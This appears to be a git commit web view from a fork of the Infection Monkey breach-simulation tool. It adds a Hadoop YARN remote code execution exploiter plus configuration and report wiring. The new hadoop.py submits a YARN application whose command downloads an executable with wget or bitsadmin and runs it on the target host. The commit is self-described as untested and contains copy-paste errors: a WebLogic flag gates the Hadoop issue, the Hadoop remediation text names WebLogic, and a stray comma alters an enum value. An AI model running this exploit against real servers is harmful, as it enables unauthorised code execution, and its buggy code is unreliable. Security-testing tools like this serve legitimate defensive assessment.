p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Core code written but nothing tested

This commit is contained in:
Vakaris 2018-07-30 17:48:15 +03:00
parent a2bebca4bc
commit 5674bebfa6
7 changed files with 146 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
infection_monkey/config.py
View File

@ -7,7 +7,7 @@ from abc import ABCMeta
from itertools import product from itertools import product
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter, \ from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter, \
SambaCryExploiter, ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter SambaCryExploiter, ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter, HadoopExploiter
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger, \ from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger, \
MSSQLFinger MSSQLFinger
@ -149,7 +149,7 @@ class Configuration(object):
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger, MySQLFinger, ElasticFinger, MSSQLFinger] finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger, MySQLFinger, ElasticFinger, MSSQLFinger]
exploiter_classes = [SmbExploiter, WmiExploiter, # Windows exploits exploiter_classes = [SmbExploiter, WmiExploiter, # Windows exploits
SSHExploiter, ShellShockExploiter, SambaCryExploiter, # Linux SSHExploiter, ShellShockExploiter, SambaCryExploiter, # Linux
ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter # multi ElasticGroovyExploiter, Struts2Exploiter, WebLogicExploiter, HadoopExploiter # multi
] ]
# how many victims to look for in a single scan iteration # how many victims to look for in a single scan iteration

3
infection_monkey/example.conf
View File

@ -38,7 +38,8 @@
"ElasticGroovyExploiter", "ElasticGroovyExploiter",
"SambaCryExploiter", "SambaCryExploiter",
"Struts2Exploiter", "Struts2Exploiter",
"WebLogicExploiter" "WebLogicExploiter",
"HadoopExploiter"
], ],
"finger_classes": [ "finger_classes": [
"SSHFinger", "SSHFinger",

1
infection_monkey/exploit/__init__.py
View File

@ -43,3 +43,4 @@ from sambacry import SambaCryExploiter
from elasticgroovy import ElasticGroovyExploiter from elasticgroovy import ElasticGroovyExploiter
from struts2 import Struts2Exploiter from struts2 import Struts2Exploiter
from weblogic import WebLogicExploiter from weblogic import WebLogicExploiter
from hadoop import HadoopExploiter

95
infection_monkey/exploit/hadoop.py Normal file
View File

@ -0,0 +1,95 @@
"""
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import requests
import json
import random
import string
import logging
from exploit.web_rce import WebRCE
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
import posixpath
from threading import Lock
from model import DROPPER_ARG
__author__ = 'VakarisZ'
LOG = logging.getLogger(__name__)
class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
HADOOP_PORTS = ["8088"]
LINUX_COMMAND = "wget -O %(monkey_path)s %(http_path)s " \
"&& chmod +x %(monkey_path)s " \
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
WINDOWS_COMMAND = "bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s " \
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
LOCK = Lock()
def __init__(self, host):
super(HadoopExploiter, self).__init__(host)
def exploit_host(self):
# Try to get exploitable url
exploitable_url = False
urls = WebRCE.build_potential_urls(self.host, self.HADOOP_PORTS)
for url in urls:
if self.try_exploit(url):
exploitable_url = url
break
if not exploitable_url:
LOG.info("No exploitable Hadoop server found")
return False
src_path = get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# Determine which destination path to use
LOG.debug("Monkey path found")
path = WebRCE.get_monkey_dest_path(self._config, src_path)
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
if 'linux' in self.host.os['type']:
command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": src_path,
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
else:
command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": src_path,
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
if not path:
return False
# To avoid race conditions we pass a locked lock to http servers thread
self.LOCK.acquire()
# Create server for http download and wait for it's startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path, self.LOCK)
self.LOCK.acquire()
self.exploit(url, command)
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
resp = json.loads(resp.content)
app_id = resp['application-id']
# Create a random name for our application in YARN
rand_name = "".join([random.choice(string.ascii_lowercase) for _ in xrange(6)])
payload = {
"application-id": app_id,
"application-name": rand_name,
"am-container-spec": {
"commands": {
"command": command,
}
},
"application-type": "YARN"
}
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
def try_exploit(self, url):
# Get the newly created application id
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
if resp.status_code == 200:
return True
else:
return False

10
monkey_island/cc/services/config.py
View File

@ -93,6 +93,13 @@ SCHEMA = {
"WebLogicExploiter" "WebLogicExploiter"
], ],
"title": "Oracle Web Logic Exploiter" "title": "Oracle Web Logic Exploiter"
},
{
"type": "string",
"enum": [
"HadoopExploiter"
],
"title": "Hadoop/Yarn Exploiter"
} }
] ]
}, },
@ -634,7 +641,8 @@ SCHEMA = {
"SambaCryExploiter", "SambaCryExploiter",
"ElasticGroovyExploiter", "ElasticGroovyExploiter",
"Struts2Exploiter", "Struts2Exploiter",
"WebLogicExploiter" "WebLogicExploiter",
"HadoopExploiter"
], ],
"description": "description":
"Determines which exploits to use. " + WARNING_SIGN "Determines which exploits to use. " + WARNING_SIGN

17
monkey_island/cc/services/report.py
View File

@ -31,7 +31,8 @@ class ReportService:
'Ms08_067_Exploiter': 'Conficker Exploiter', 'Ms08_067_Exploiter': 'Conficker Exploiter',
'ShellShockExploiter': 'ShellShock Exploiter', 'ShellShockExploiter': 'ShellShock Exploiter',
'Struts2Exploiter': 'Struts2 Exploiter', 'Struts2Exploiter': 'Struts2 Exploiter',
'WebLogicExploiter': 'Oracle WebLogic exploiter' 'WebLogicExploiter': 'Oracle WebLogic Exploiter',
'HadoopExploiter': 'Hadoop/Yarn Exploiter'
} }
class ISSUES_DICT(Enum): class ISSUES_DICT(Enum):
@ -44,7 +45,8 @@ class ReportService:
AZURE = 6 AZURE = 6
STOLEN_SSH_KEYS = 7 STOLEN_SSH_KEYS = 7
STRUTS2 = 8 STRUTS2 = 8
WEBLOGIC = 9 WEBLOGIC = 9,
HADOOP = 10
class WARNINGS_DICT(Enum): class WARNINGS_DICT(Enum):
CROSS_SEGMENT = 0 CROSS_SEGMENT = 0
@ -306,6 +308,12 @@ class ReportService:
processed_exploit['type'] = 'weblogic' processed_exploit['type'] = 'weblogic'
return processed_exploit return processed_exploit
@staticmethod
def process_hadoop_exploit(exploit):
processed_exploit = ReportService.process_general_exploit(exploit)
processed_exploit['type'] = 'hadoop'
return processed_exploit
@staticmethod @staticmethod
def process_exploit(exploit): def process_exploit(exploit):
exploiter_type = exploit['data']['exploiter'] exploiter_type = exploit['data']['exploiter']
@ -319,7 +327,8 @@ class ReportService:
'Ms08_067_Exploiter': ReportService.process_conficker_exploit, 'Ms08_067_Exploiter': ReportService.process_conficker_exploit,
'ShellShockExploiter': ReportService.process_shellshock_exploit, 'ShellShockExploiter': ReportService.process_shellshock_exploit,
'Struts2Exploiter': ReportService.process_struts2_exploit, 'Struts2Exploiter': ReportService.process_struts2_exploit,
'WebLogicExploiter': ReportService.process_weblogic_exploit 'WebLogicExploiter': ReportService.process_weblogic_exploit,
'HadoopExploiter': ReportService.process_hadoop_exploit
} }
return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit) return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
@ -441,6 +450,8 @@ class ReportService:
issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
elif issue['type'] == 'weblogic': elif issue['type'] == 'weblogic':
issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
elif issue['type'] == 'hadoop':
issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \ elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
issue['username'] in config_users or issue['type'] == 'ssh': issue['username'] in config_users or issue['type'] == 'ssh':
issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True

24
monkey_island/cc/ui/src/components/pages/ReportPage.js
View File

@ -25,7 +25,8 @@ class ReportPageComponent extends AuthComponent {
AZURE: 6, AZURE: 6,
STOLEN_SSH_KEYS: 7, STOLEN_SSH_KEYS: 7,
STRUTS2: 8, STRUTS2: 8,
WEBLOGIC: 9 WEBLOGIC: 9,
HADOOP: 10
}; };
Warning = Warning =
@ -331,6 +332,8 @@ class ReportPageComponent extends AuthComponent {
<li>Oracle WebLogic servers are vulnerable to remote code execution. (<a <li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271"> href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
CVE-2017-10271</a>)</li> : null } CVE-2017-10271</a>)</li> : null }
{this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
</ul> </ul>
</div> </div>
: :
@ -716,6 +719,22 @@ class ReportPageComponent extends AuthComponent {
); );
} }
generateHadoopIssue(issue) {
return (
<li>
Run Hadoop in secure mode(<a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
add Kerberos authentication</a>).
<CollapsibleWellComponent>
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="label label-danger">remote code execution</span> attack.
<br/>
The attack was made possible due to default Hadoop/Yarn configuration being insecure.
</CollapsibleWellComponent>
</li>
);
}
generateIssue = (issue) => { generateIssue = (issue) => {
@ -769,6 +788,9 @@ class ReportPageComponent extends AuthComponent {
case 'weblogic': case 'weblogic':
data = this.generateWebLogicIssue(issue); data = this.generateWebLogicIssue(issue);
break; break;
case 'hadoop':
data = this.generateHadoopIssue(issue);
break;
} }
return data; return data;
}; };